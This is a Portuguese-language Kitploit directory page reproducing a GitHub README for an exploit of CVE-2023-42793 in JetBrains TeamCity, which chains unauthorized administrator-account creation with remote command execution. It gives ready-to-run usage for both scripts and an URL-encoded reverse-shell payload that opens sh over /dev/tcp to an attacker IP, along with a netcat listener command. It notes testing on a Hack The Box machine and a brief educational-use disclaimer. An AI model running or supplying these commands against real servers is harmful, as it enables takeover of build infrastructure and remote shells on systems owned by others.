Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - Execução Remota de Código (RCE), CVE-2023-42793 | Kitploit
Ferramentas/GitHubGitHub/b4l3ri0n/cve-2023-42793
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - Execução Remota de Código (RCE), CVE-2023-42793

Ver Repositório
113há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2023-42793 - Criação de conta de administrador no TeamCity leva a RCE

Use primeiro exploit.py para criar uma conta de administrador para você e depois use rce.py para executar comandos no alvo. Para reverse shell, veja isto

script de exploração

Descrição

Este script explora a CVE-2023-42793 para criar uma conta de administrador em um servidor TeamCity. Ele envia uma requisição POST para a URL alvo para criar um usuário administrador com credenciais especificadas ou aleatórias.

Uso

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Opções

  • -u, --url URL: URL alvo (obrigatório)
  • -v, --verbose: Ativar modo verboso
  • -n, --username USERNAME: Especificar nome de usuário (padrão: aleatório)
  • -p, --password PASSWORD: Especificar senha (padrão: aleatório)
  • -e, --email EMAIL: Especificar email (padrão: aleatório)
  • -t, --token-file: Arquivo para salvar o token

Pré-requisitos

  • Python 3.x
  • Bibliotecas Python
    • Para instalar as dependências: pip3 install -r requirements.txt

Exemplos

  1. Exploração com nome de usuário, senha e email aleatórios:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. Exploração com nome de usuário, senha e email especificados:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

Saída

Após exploração bem-sucedida, o script exibe a URL, o nome de usuário e a senha da conta de administrador criada e salva a saída no arquivo de token.

Script de Execução Remota de Código (RCE)

Descrição

Este script permite executar comandos em um servidor TeamCity vulnerável explorando a CVE-2023-42793. Primeiro, ele ativa os processos de depuração e depois executa o comando especificado usando os endpoints apropriados da API.

Uso

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

Opções

  • -u, --url URL: URL alvo (obrigatório)
  • -t, --token-file: Para especificar o arquivo contendo o token
  • -c, --command COMMAND: Especificar comando a executar (RCE)
  • -P, --port PORT: Especificar porta (padrão é 80)

Exemplo

Exploração com um comando especificado:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

Para reverse shell

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • Neste comando para reverse shell, substitua {IP} pelo seu IP e {port} pela porta em que você está escutando
  • Crie um listener usando nc, por exemplo: nc -nvlp 5555
  • Para mais informações, veja revshells

Notas

  • Este script foi testado na máquina Runner.htb do Hack The Box
  • Este script é apenas para fins educacionais.
  • Use-o com responsabilidade e apenas em sistemas que você está autorizado a testar.

Créditos

  • Zyad Elsayed
    • Repositório GitHub: Zyad-Elsayed
    • Conta LinkedIn: zyad-abdelbary
  • Exploit original para conta de administrador: ByteHunter (Exploit-DB)

Recursos

  • Descrição da CVE-2023-42793: Descrição oficial da vulnerabilidade CVE.
  • Entrada no Exploit Database: Código original do exploit no Exploit Database.
  • Blog da TeamCity: Postagem no blog discutindo a vulnerabilidade CVE-2023-42793 no TeamCity.
  • Documentação do TeamCity: Documentação oficial do TeamCity.
Baixar ferramenta